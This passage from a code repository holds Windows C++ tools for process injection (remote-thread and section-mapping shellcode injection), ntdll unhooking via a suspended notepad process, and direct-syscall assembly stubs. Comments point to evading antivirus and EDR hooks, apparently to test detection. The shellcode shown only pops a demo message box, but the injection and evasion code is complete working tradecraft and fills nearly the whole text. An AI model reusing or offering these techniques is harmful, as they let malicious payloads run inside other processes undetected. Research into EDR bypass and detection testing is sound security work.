"\x6c\x6f\x63\x6b\x65\x64\x2e\x00\x4f\x53\x33\x20\x44\x65\x6d" 48 | "\x6f\x00"; 49 | 50 | 51 | HANDLE processHandle; 52 | HANDLE remoteThread; 53 | PVOID remoteBuffer; 54 | 55 | int pid = atoi(argv[1]); 56 | printf("Injecting into PID : %i... ", pid); 57 | processHandle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, DWORD(pid)); 58 | if (processHandle == 0) 59 | { 60 | printf("ERROR: Proc hand 0"); 61 | return -1; 62 | } 63 | remoteBuffer = VirtualAllocEx(processHandle, NULL, sizeof buf5, (MEM_RESERVE | MEM_COMMIT), PAGE_EXECUTE_READWRITE); 64 | if (remoteBuffer == 0) 65 | { 66 | printf("ERROR: Remote buf 0"); 67 | return -1; 68 | } 69 | SIZE_T lpNumberOfBytesWritten; 70 | 71 | WriteProcessMemory(processHandle, remoteBuffer, buf5, sizeof buf5, &lpNumberOfBytesWritten); 72 | if (lpNumberOfBytesWritten != (sizeof buf5)) 73 | { 74 | printf("ERROR: Written %d", lpNumberOfBytesWritten); 75 | return -1; 76 | } 77 | remoteThread = CreateRemoteThread(processHandle, NULL, 0, (LPTHREAD_START_ROUTINE)remoteBuffer, NULL, 0, NULL); //The one that should trigger AV 78 | if (remoteThread == 0) 79 | { 80 | printf("ERROR: Remote thr 0"); 81 | return -1; 82 | } 83 | CloseHandle(processHandle); 84 | Sleep(9000); 85 | printf("Done.\n"); 86 | return 0; 87 | } 88 | -------------------------------------------------------------------------------- /CustomCode/PaLoInj/PaLoInj.vcxproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | 16.0 23 | Win32Proj 24 | {2f83ec28-30ea-4ff5-843b-ee474d66b935} 25 | PaLoInj 26 | 10.0 27 | 28 | 29 | 30 | Application 31 | true 32 | v142 33 | Unicode 34 | 35 | 36 | Application 37 | false 38 | v142 39 | true 40 | Unicode 41 | 42 | 43 | Application 44 | true 45 | v142 46 | Unicode 47 | 48 | 49 | Application 50 | false 51 | v142 52 | true 53 | Unicode 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | true 75 | 76 | 77 | false 78 | 79 | 80 | true 81 | 82 | 83 | false 84 | 85 | 86 | 87 | Level3 88 | true 89 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) 90 | true 91 | 92 | 93 | Console 94 | true 95 | 96 | 97 | 98 | 99 | Level3 100 | true 101 | true 102 | true 103 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 104 | true 105 | 106 | 107 | Console 108 | true 109 | true 110 | true 111 | 112 | 113 | 114 | 115 | Level3 116 | true 117 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions) 118 | true 119 | 120 | 121 | Console 122 | true 123 | 124 | 125 | 126 | 127 | Level3 128 | true 129 | true 130 | true 131 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 132 | true 133 | MultiThreaded 134 | 135 | 136 | Console 137 | true 138 | true 139 | true 140 | 141 | 142 | 143 | 144 | 145 | 146 | 147 | 148 | -------------------------------------------------------------------------------- /CustomCode/PaLoInj/PaLoInj.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | -------------------------------------------------------------------------------- /CustomCode/PaLoIns/PaLoIns.cpp: -------------------------------------------------------------------------------- 1 | #undef _UNICODE 2 | #define _UNICODE 3 | #undef UNICODE 4 | #define UNICODE 5 | 6 | #include 7 | #include 8 | 9 | void step(int line) 10 | { 11 | printf("[%d]", line); 12 | Sleep(1000); 13 | } 14 | 15 | typedef struct _LSA_UNICODE_STRING { USHORT Length; USHORT MaximumLength; PWSTR Buffer; } UNICODE_STRING, * PUNICODE_STRING; 16 | typedef struct _OBJECT_ATTRIBUTES { ULONG Length; HANDLE RootDirectory; PUNICODE_STRING ObjectName; ULONG Attributes; PVOID SecurityDescriptor; PVOID SecurityQualityOfService; } OBJECT_ATTRIBUTES, * POBJECT_ATTRIBUTES; 17 | typedef struct _CLIENT_ID { PVOID UniqueProcess; PVOID UniqueThread; } CLIENT_ID, * PCLIENT_ID; 18 | using myNtCreateSection = NTSTATUS(NTAPI*)(OUT PHANDLE SectionHandle, IN ULONG DesiredAccess, IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL, IN PLARGE_INTEGER MaximumSize OPTIONAL, IN ULONG PageAttributess, IN ULONG SectionAttributes, IN HANDLE FileHandle OPTIONAL); 19 | using myNtMapViewOfSection = NTSTATUS(NTAPI*)(HANDLE SectionHandle, HANDLE ProcessHandle, PVOID* BaseAddress, ULONG_PTR ZeroBits, SIZE_T CommitSize, PLARGE_INTEGER SectionOffset, PSIZE_T ViewSize, DWORD InheritDisposition, ULONG AllocationType, ULONG Win32Protect); 20 | using myRtlCreateUserThread = NTSTATUS(NTAPI*)(IN HANDLE ProcessHandle, IN PSECURITY_DESCRIPTOR SecurityDescriptor OPTIONAL, IN BOOLEAN CreateSuspended, IN ULONG StackZeroBits, IN OUT PULONG StackReserved, IN OUT PULONG StackCommit, IN PVOID StartAddress, IN PVOID StartParameter OPTIONAL, OUT PHANDLE ThreadHandle, OUT PCLIENT_ID ClientID); 21 | 22 | 23 | int main(int argc, char* argv[]) 24 | { 25 | printf("Compile time (for unique compilation): %s\n", __TIME__); 26 | printf("Waiting for some time to allow UH technique and detection of hooks...\n"); 27 | Sleep(9000); 28 | Sleep(9000); 29 | Sleep(9000); 30 | Sleep(9000); 31 | Sleep(9000); 32 | Sleep(9000); 33 | Sleep(9000); 34 | Sleep(9000); 35 | Sleep(9000); 36 | Sleep(9000); 37 | unsigned char buf5[] = 38 | 39 | //Messagebox OS3: 40 | "\xfc\x48\x81\xe4\xf0\xff\xff\xff\xe8\xd0\x00\x00\x00\x41\x51" 41 | "\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x3e\x48" 42 | "\x8b\x52\x18\x3e\x48\x8b\x52\x20\x3e\x48\x8b\x72\x50\x3e\x48" 43 | "\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02" 44 | "\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x3e" 45 | "\x48\x8b\x52\x20\x3e\x8b\x42\x3c\x48\x01\xd0\x3e\x8b\x80\x88" 46 | "\x00\x00\x00\x48\x85\xc0\x74\x6f\x48\x01\xd0\x50\x3e\x8b\x48" 47 | "\x18\x3e\x44\x8b\x40\x20\x49\x01\xd0\xe3\x5c\x48\xff\xc9\x3e" 48 | "\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41" 49 | "\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x3e\x4c\x03\x4c\x24" 50 | "\x08\x45\x39\xd1\x75\xd6\x58\x3e\x44\x8b\x40\x24\x49\x01\xd0" 51 | "\x66\x3e\x41\x8b\x0c\x48\x3e\x44\x8b\x40\x1c\x49\x01\xd0\x3e" 52 | "\x41\x8b\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41" 53 | "\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41" 54 | "\x59\x5a\x3e\x48\x8b\x12\xe9\x49\xff\xff\xff\x5d\x49\xc7\xc1" 55 | "\x00\x00\x00\x00\x3e\x48\x8d\x95\xfe\x00\x00\x00\x3e\x4c\x8d" 56 | "\x85\x27\x01\x00\x00\x48\x31\xc9\x41\xba\x45\x83\x56\x07\xff" 57 | "\xd5\x48\x31\xc9\x41\xba\xf0\xb5\xa2\x56\xff\xd5\x54\x68\x69" 58 | "\x73\x20\x69\x6e\x6a\x65\x63\x74\x65\x64\x20\x6d\x65\x73\x73" 59 | "\x61\x67\x65\x62\x6f\x78\x20\x69\x73\x20\x6e\x6f\x74\x20\x62" 60 | "\x6c\x6f\x63\x6b\x65\x64\x2e\x00\x4f\x53\x33\x20\x44\x65\x6d" 61 | "\x6f\x00"; 62 | 63 | HANDLE processHandle; 64 | HANDLE remoteThread; 65 | PVOID remoteBuffer; 66 | //int pid = 49716; 67 | int pid = atoi(argv[1]); 68 | printf("Injecting into PID : %i... ", pid); 69 | step(__LINE__); 70 | myNtCreateSection fNtCreateSection = (myNtCreateSection)(GetProcAddress(GetModuleHandleA("ntdll"), "NtCreateSection")); 71 | myNtMapViewOfSection fNtMapViewOfSection = (myNtMapViewOfSection)(GetProcAddress(GetModuleHandleA("ntdll"), "NtMapViewOfSection")); //The one that should trigger AV 72 | myRtlCreateUserThread fRtlCreateUserThread = (myRtlCreateUserThread)(GetProcAddress(GetModuleHandleA("ntdll"), "RtlCreateUserThread")); 73 | SIZE_T size = 4096; 74 | LARGE_INTEGER sectionSize = { size }; 75 | HANDLE sectionHandle = NULL; 76 | PVOID localSectionAddress = NULL, remoteSectionAddress = NULL; 77 | step(__LINE__); 78 | // create a memory section 79 | fNtCreateSection(§ionHandle, SECTION_MAP_READ | SECTION_MAP_WRITE | SECTION_MAP_EXECUTE, NULL, (PLARGE_INTEGER)§ionSize, PAGE_EXECUTE_READWRITE, SEC_COMMIT, NULL); 80 | if (sectionHandle == NULL) 81 | { 82 | printf("ERROR: sec hand = NULL"); 83 | return -1; 84 | } 85 | 86 | step(__LINE__); 87 | // create a view of the memory section in the local process 88 | fNtMapViewOfSection(sectionHandle, GetCurrentProcess(), &localSectionAddress, NULL, NULL, NULL, &size, 2, NULL, PAGE_READWRITE); 89 | if (localSectionAddress == NULL) 90 | { 91 | printf("ERROR: loc sec addr = NULL"); 92 | return -1; 93 | } 94 | step(__LINE__); 95 | // create a view of the memory section in the target process 96 | HANDLE targetHandle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, (DWORD)pid); 97 | if (targetHandle == 0) 98 | { 99 | printf("ERROR: Open proc hand = 0"); 100 | return -1; 101 | } 102 | step(__LINE__); 103 | fNtMapViewOfSection(sectionHandle, targetHandle, &remoteSectionAddress, NULL, NULL, NULL, &size, 2, NULL, PAGE_EXECUTE_READ); 104 | if (sectionHandle == 0) 105 | { 106 | printf("ERROR: Sec hand hand = 0"); 107 | return -1; 108 | } 109 | 110 | step(__LINE__); 111 | 112 | // copy shellcode to the local view, which will get reflected in the target process's mapped view 113 | memcpy(localSectionAddress, buf5, sizeof buf5); 114 | step(__LINE__); 115 | HANDLE targetThreadHandle = NULL; 116 | fRtlCreateUserThread(targetHandle, NULL, FALSE, 0, 0, 0, remoteSectionAddress, NULL, &targetThreadHandle, NULL); 117 | if (targetThreadHandle == NULL) 118 | { 119 | printf("ERROR: target Thread Hand = NULL"); 120 | return -1; 121 | } 122 | 123 | Sleep(9000); 124 | step(__LINE__); 125 | printf("Done.\n"); 126 | 127 | return 0; 128 | } 129 | 130 | -------------------------------------------------------------------------------- /CustomCode/PaLoIns/PaLoIns.vcxproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | 16.0 23 | Win32Proj 24 | {5785080c-1a0f-4c44-a7cd-b65504b3a62a} 25 | PaLoIns 26 | 10.0 27 | 28 | 29 | 30 | Application 31 | true 32 | v142 33 | Unicode 34 | 35 | 36 | Application 37 | false 38 | v142 39 | true 40 | Unicode 41 | 42 | 43 | Application 44 | true 45 | v142 46 | Unicode 47 | 48 | 49 | Application 50 | false 51 | v142 52 | true 53 | Unicode 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | true 75 | 76 | 77 | false 78 | 79 | 80 | true 81 | 82 | 83 | false 84 | 85 | 86 | 87 | Level3 88 | true 89 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) 90 | true 91 | 92 | 93 | Console 94 | true 95 | 96 | 97 | 98 | 99 | Level3 100 | true 101 | true 102 | true 103 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 104 | true 105 | 106 | 107 | Console 108 | true 109 | true 110 | true 111 | 112 | 113 | 114 | 115 | Level3 116 | true 117 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions) 118 | true 119 | 120 | 121 | Console 122 | true 123 | 124 | 125 | 126 | 127 | Level3 128 | true 129 | true 130 | true 131 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 132 | true 133 | 134 | 135 | Console 136 | true 137 | true 138 | true 139 | 140 | 141 | 142 | 143 | 144 | 145 | 146 | 147 | -------------------------------------------------------------------------------- /CustomCode/PaLoIns/PaLoIns.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | -------------------------------------------------------------------------------- /CustomCode/PerunsFart/PerunsFart.cpp: -------------------------------------------------------------------------------- 1 | #undef _UNICODE 2 | #define _UNICODE 3 | #undef UNICODE 4 | #define UNICODE 5 | 6 | #define bytesToCompare 16 7 | 8 | #include 9 | #include 10 | #include "PerunsFart.h" 11 | #include 12 | 13 | HANDLE StartSuspendedProcess() 14 | { 15 | PROCESS_INFORMATION processInfo; 16 | STARTUPINFOA startupInfo{}; 17 | startupInfo.cb = sizeof(STARTUPINFOA); 18 | char cmd[] = "notepad.exe"; 19 | if (!CreateProcessA(nullptr, cmd, nullptr, nullptr, false, CREATE_SUSPENDED, 20 | nullptr, nullptr, std::addressof(startupInfo), std::addressof(processInfo))) 21 | { 22 | std::cerr << "CreateProcess failed, " << GetLastError() << '\n'; 23 | return NULL; 24 | } 25 | return processInfo.hProcess; 26 | } 27 | 28 | #define NtCurrentProcess() INVALID_HANDLE_VALUE 29 | 30 | int wmain(int argc, wchar_t* argv[]) 31 | { 32 | if (argc != 2) 33 | { 34 | printf("Supply target pid to restore ntdll.dll for using new sleeping notepad. \n"); 35 | return -1; 36 | } 37 | 38 | DWORD targetPid = _wtoi(argv[1]); 39 | 40 | HANDLE pausedProcess = StartSuspendedProcess(); 41 | Sleep(5000); //Can take some while to start due to AV 42 | if (pausedProcess == NULL) 43 | { 44 | printf("ERROR: could not create sleeping notepad!"); 45 | return -1; 46 | } 47 | 48 | //Open process using syscalls 49 | DWORD pid = targetPid; 50 | HANDLE processHandleTarget = NULL; 51 | OBJECT_ATTRIBUTES ObjectAttributesTarget; 52 | InitializeObjectAttributes(&ObjectAttributesTarget, NULL, 0, NULL, NULL); 53 | CLIENT_ID uPidTarget = { 0 }; 54 | uPidTarget.UniqueProcess = (HANDLE)pid; 55 | uPidTarget.UniqueThread = (HANDLE)0; 56 | NTSTATUS statusOpenTarget = ZwOpenProcess10(&processHandleTarget, SYNCHRONIZE | STANDARD_RIGHTS_REQUIRED | 0xFFFF, &ObjectAttributesTarget, &uPidTarget); 57 | if (statusOpenTarget != 0) 58 | { 59 | printf("Error opening target process!"); 60 | return -2; 61 | } 62 | 63 | HMODULE Ntdll = GetModuleHandleA((LPCSTR)"ntdll.dll"); 64 | MODULEINFO moduleInfo = {}; 65 | 66 | //Get ntdll.dll information based on loaded version for current process 67 | if (GetModuleInformation(GetCurrentProcess(), Ntdll, &moduleInfo, sizeof(moduleInfo)) == 0) { 68 | printf("GetModuleInformation error: %d\n", GetLastError()); 69 | printf("[%d]\n", __LINE__); 70 | return -3; 71 | } 72 | 73 | // Get base address of hooked Ntdll from MODULEINFO struct 74 | LPVOID hookedNtdllBaseAddress = NULL; 75 | hookedNtdllBaseAddress = (LPVOID)moduleInfo.lpBaseOfDll; 76 | 77 | printf("%-20s 0x%p\n", "Tainted dll base address: ", hookedNtdllBaseAddress); 78 | 79 | PIMAGE_DOS_HEADER dosHeader = 0; 80 | PIMAGE_NT_HEADERS ntHeader = 0; 81 | PIMAGE_SECTION_HEADER sectionHeader = 0; 82 | LPSTR sectionName; 83 | SIZE_T textSectionSize = NULL; 84 | LPVOID hookedNtdllTextStartAddress = NULL; 85 | 86 | // Get DOS header 87 | dosHeader = (PIMAGE_DOS_HEADER)hookedNtdllBaseAddress; 88 | 89 | // Get Nt Header 90 | ntHeader = (PIMAGE_NT_HEADERS)((DWORD_PTR)hookedNtdllBaseAddress + dosHeader->e_lfanew); 91 | 92 | Sleep(50); 93 | // Loop through all the PE sections until we find .text section (some adapted code based on Shellycoat) 94 | for (SIZE_T i = 0; i < ntHeader->FileHeader.NumberOfSections; i++) { 95 | // Get PE section header 96 | sectionHeader = (PIMAGE_SECTION_HEADER)((DWORD_PTR)IMAGE_FIRST_SECTION(ntHeader) + ((DWORD_PTR)IMAGE_SIZEOF_SECTION_HEADER * i)); 97 | 98 | // Get section name 99 | sectionName = (LPSTR)sectionHeader->Name; 100 | 101 | // We found .text section 102 | if (!strcmp(sectionName, ".text")) { 103 | Sleep(50); 104 | printf("Found .text section\n"); 105 | 106 | textSectionSize = sectionHeader->Misc.VirtualSize; 107 | printf(".text section size: %d\n", textSectionSize); 108 | hookedNtdllTextStartAddress = (LPVOID)((DWORD_PTR)hookedNtdllBaseAddress + (DWORD_PTR)sectionHeader->VirtualAddress); 109 | break; 110 | } 111 | } 112 | if (textSectionSize == NULL) 113 | { 114 | printf("Error: .text section not found!"); 115 | return -4; 116 | } 117 | 118 | SIZE_T lpNumberOfBytesRead = 0; 119 | SIZE_T lpNumberOfBytesWritten = 0; 120 | PVOID buffer = (PVOID)malloc((ULONG)(textSectionSize+4096)); //4096 is page size 121 | 122 | printf("Reading from source...\n"); 123 | NTSTATUS statusRead = NtReadVirtualMemory(pausedProcess,hookedNtdllTextStartAddress,buffer, textSectionSize,&lpNumberOfBytesRead); 124 | if (statusRead != STATUS_SUCCESS) { 125 | printf("NtReadVirtualMemory error: %X\n", statusRead); 126 | return -5; 127 | } 128 | //Remove page protection (store old details) 129 | printf("Removing page prot...\n"); 130 | ULONG oldProtection; 131 | NTSTATUS statusProtect = ZwProtectVirtualMemory10(processHandleTarget, &hookedNtdllTextStartAddress,&textSectionSize, PAGE_EXECUTE_READWRITE, &oldProtection); 132 | if (statusProtect != STATUS_SUCCESS) { 133 | printf("ZwProtectVirtualMemory10 error: %X\n", statusProtect); 134 | return -6; 135 | } 136 | 137 | //Write fresh ntdll.dll 138 | printf("Writing to target...\n"); 139 | NTSTATUS statusWrite = ZwWriteVirtualMemory10(processHandleTarget, hookedNtdllTextStartAddress, buffer, textSectionSize, &lpNumberOfBytesWritten); 140 | if (statusWrite != STATUS_SUCCESS) { 141 | printf("ZwWriteVirtualMemory10 error: %X\n", statusWrite); 142 | return -7; 143 | } 144 | 145 | //Restore right page protections 146 | printf("Restoring page prot...\n"); 147 | NTSTATUS statusRestore = ZwProtectVirtualMemory10(processHandleTarget, &hookedNtdllTextStartAddress, &textSectionSize, PAGE_EXECUTE_READWRITE, &oldProtection); 148 | if (statusRestore != STATUS_SUCCESS) { 149 | printf("ZwProtectVirtualMemory10 error: %X\n", statusRestore); 150 | return -8; 151 | } 152 | TerminateProcess(pausedProcess, 0); 153 | CloseHandle(pausedProcess); 154 | printf("Done!\n"); 155 | } -------------------------------------------------------------------------------- /CustomCode/PerunsFart/PerunsFart.vcxproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | 16.0 23 | Win32Proj 24 | {dbf7feb0-f95d-41be-8ecb-6caca1be2991} 25 | PerunsFart 26 | 10.0 27 | 28 | 29 | 30 | Application 31 | true 32 | v142 33 | Unicode 34 | 35 | 36 | Application 37 | false 38 | v142 39 | true 40 | Unicode 41 | 42 | 43 | Application 44 | true 45 | v142 46 | Unicode 47 | 48 | 49 | Application 50 | false 51 | v142 52 | true 53 | Unicode 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | true 76 | 77 | 78 | false 79 | 80 | 81 | true 82 | 83 | 84 | false 85 | 86 | 87 | 88 | Level3 89 | true 90 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) 91 | true 92 | 93 | 94 | Console 95 | true 96 | 97 | 98 | 99 | 100 | Level3 101 | true 102 | true 103 | true 104 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 105 | true 106 | 107 | 108 | Console 109 | true 110 | true 111 | true 112 | 113 | 114 | 115 | 116 | Level3 117 | true 118 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions) 119 | true 120 | 121 | 122 | Console 123 | true 124 | 125 | 126 | 127 | 128 | Level3 129 | true 130 | true 131 | true 132 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 133 | true 134 | 135 | 136 | Console 137 | true 138 | true 139 | true 140 | 141 | 142 | 143 | 144 | 145 | 146 | 147 | 148 | 149 | 150 | 151 | 152 | 153 | 154 | 155 | -------------------------------------------------------------------------------- /CustomCode/PerunsFart/PerunsFart.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | 23 | 24 | Header Files 25 | 26 | 27 | 28 | 29 | Source Files 30 | 31 | 32 | -------------------------------------------------------------------------------- /CustomCode/PerunsFart/Syscalls.asm: -------------------------------------------------------------------------------- 1 | .code 2 | 3 | ; Reference: https://j00ru.vexillium.org/syscalls/nt/64/ 4 | 5 | ; Windows 7 SP1 / Server 2008 R2 specific syscalls 6 | 7 | NtReadVirtualMemory PROC 8 | mov rax, gs:[60h] ; Load PEB into RAX. 9 | NtReadVirtualMemory_Check_X_X_XXXX: ; Check major version. 10 | cmp dword ptr [rax+118h], 10 11 | je NtReadVirtualMemory_Check_10_0_XXXX 12 | jmp NtReadVirtualMemory_SystemCall_Unknown 13 | NtReadVirtualMemory_Check_10_0_XXXX: ; Check build number for Windows 10. 14 | cmp word ptr [rax+120h], 10240 15 | je NtReadVirtualMemory_SystemCall_10_0_10240 16 | cmp word ptr [rax+120h], 10586 17 | je NtReadVirtualMemory_SystemCall_10_0_10586 18 | cmp word ptr [rax+120h], 14393 19 | je NtReadVirtualMemory_SystemCall_10_0_14393 20 | cmp word ptr [rax+120h], 15063 21 | je NtReadVirtualMemory_SystemCall_10_0_15063 22 | cmp word ptr [rax+120h], 16299 23 | je NtReadVirtualMemory_SystemCall_10_0_16299 24 | cmp word ptr [rax+120h], 17134 25 | je NtReadVirtualMemory_SystemCall_10_0_17134 26 | cmp word ptr [rax+120h], 17763 27 | je NtReadVirtualMemory_SystemCall_10_0_17763 28 | cmp word ptr [rax+120h], 18362 29 | je NtReadVirtualMemory_SystemCall_10_0_18362 30 | cmp word ptr [rax+120h], 18363 31 | je NtReadVirtualMemory_SystemCall_10_0_18363 32 | cmp word ptr [rax+120h], 19041 33 | je NtReadVirtualMemory_SystemCall_10_0_19041 34 | cmp word ptr [rax+120h], 19042 35 | je NtReadVirtualMemory_SystemCall_10_0_19042 36 | jmp NtReadVirtualMemory_SystemCall_Unknown 37 | NtReadVirtualMemory_SystemCall_10_0_10240: ; Windows 10.0.10240 (1507) 38 | mov eax, 003fh 39 | jmp NtReadVirtualMemory_Epilogue 40 | NtReadVirtualMemory_SystemCall_10_0_10586: ; Windows 10.0.10586 (1511) 41 | mov eax, 003fh 42 | jmp NtReadVirtualMemory_Epilogue 43 | NtReadVirtualMemory_SystemCall_10_0_14393: ; Windows 10.0.14393 (1607) 44 | mov eax, 003fh 45 | jmp NtReadVirtualMemory_Epilogue 46 | NtReadVirtualMemory_SystemCall_10_0_15063: ; Windows 10.0.15063 (1703) 47 | mov eax, 003fh 48 | jmp NtReadVirtualMemory_Epilogue 49 | NtReadVirtualMemory_SystemCall_10_0_16299: ; Windows 10.0.16299 (1709) 50 | mov eax, 003fh 51 | jmp NtReadVirtualMemory_Epilogue 52 | NtReadVirtualMemory_SystemCall_10_0_17134: ; Windows 10.0.17134 (1803) 53 | mov eax, 003fh 54 | jmp NtReadVirtualMemory_Epilogue 55 | NtReadVirtualMemory_SystemCall_10_0_17763: ; Windows 10.0.17763 (1809) 56 | mov eax, 003fh 57 | jmp NtReadVirtualMemory_Epilogue 58 | NtReadVirtualMemory_SystemCall_10_0_18362: ; Windows 10.0.18362 (1903) 59 | mov eax, 003fh 60 | jmp NtReadVirtualMemory_Epilogue 61 | NtReadVirtualMemory_SystemCall_10_0_18363: ; Windows 10.0.18363 (1909) 62 | mov eax, 003fh 63 | jmp NtReadVirtualMemory_Epilogue 64 | NtReadVirtualMemory_SystemCall_10_0_19041: ; Windows 10.0.19041 (2004) 65 | mov eax, 003fh 66 | jmp NtReadVirtualMemory_Epilogue 67 | NtReadVirtualMemory_SystemCall_10_0_19042: ; Windows 10.0.19042 (20H2) 68 | mov eax, 003fh 69 | jmp NtReadVirtualMemory_Epilogue 70 | NtReadVirtualMemory_SystemCall_Unknown: ; Unknown/unsupported version. 71 | ret 72 | NtReadVirtualMemory_Epilogue: 73 | mov r10, rcx 74 | syscall 75 | ret 76 | NtReadVirtualMemory ENDP 77 | 78 | ZwOpenProcess7SP1 proc 79 | mov r10, rcx 80 | mov eax, 23h 81 | syscall 82 | ret 83 | ZwOpenProcess7SP1 endp 84 | 85 | ZwClose7SP1 proc 86 | mov r10, rcx 87 | mov eax, 0Ch 88 | syscall 89 | ret 90 | ZwClose7SP1 endp 91 | 92 | ZwWriteVirtualMemory7SP1 proc 93 | mov r10, rcx 94 | mov eax, 37h 95 | syscall 96 | ret 97 | ZwWriteVirtualMemory7SP1 endp 98 | 99 | ZwProtectVirtualMemory7SP1 proc 100 | mov r10, rcx 101 | mov eax, 4Dh 102 | syscall 103 | ret 104 | ZwProtectVirtualMemory7SP1 endp 105 | 106 | ZwQuerySystemInformation7SP1 proc 107 | mov r10, rcx 108 | mov eax, 33h 109 | syscall 110 | ret 111 | ZwQuerySystemInformation7SP1 endp 112 | 113 | NtAllocateVirtualMemory7SP1 proc 114 | mov r10, rcx 115 | mov eax, 15h 116 | syscall 117 | ret 118 | NtAllocateVirtualMemory7SP1 endp 119 | 120 | NtFreeVirtualMemory7SP1 proc 121 | mov r10, rcx 122 | mov eax, 1Bh 123 | syscall 124 | ret 125 | NtFreeVirtualMemory7SP1 endp 126 | 127 | NtCreateFile7SP1 proc 128 | mov r10, rcx 129 | mov eax, 52h 130 | syscall 131 | ret 132 | NtCreateFile7SP1 endp 133 | 134 | ; Windows 8 / Server 2012 specific syscalls 135 | 136 | ZwOpenProcess80 proc 137 | mov r10, rcx 138 | mov eax, 24h 139 | syscall 140 | ret 141 | ZwOpenProcess80 endp 142 | 143 | ZwClose80 proc 144 | mov r10, rcx 145 | mov eax, 0Dh 146 | syscall 147 | ret 148 | ZwClose80 endp 149 | 150 | ZwWriteVirtualMemory80 proc 151 | mov r10, rcx 152 | mov eax, 38h 153 | syscall 154 | ret 155 | ZwWriteVirtualMemory80 endp 156 | 157 | ZwProtectVirtualMemory80 proc 158 | mov r10, rcx 159 | mov eax, 4Eh 160 | syscall 161 | ret 162 | ZwProtectVirtualMemory80 endp 163 | 164 | ZwQuerySystemInformation80 proc 165 | mov r10, rcx 166 | mov eax, 34h 167 | syscall 168 | ret 169 | ZwQuerySystemInformation80 endp 170 | 171 | NtAllocateVirtualMemory80 proc 172 | mov r10, rcx 173 | mov eax, 16h 174 | syscall 175 | ret 176 | NtAllocateVirtualMemory80 endp 177 | 178 | NtFreeVirtualMemory80 proc 179 | mov r10, rcx 180 | mov eax, 1Ch 181 | syscall 182 | ret 183 | NtFreeVirtualMemory80 endp 184 | 185 | NtCreateFile80 proc 186 | mov r10, 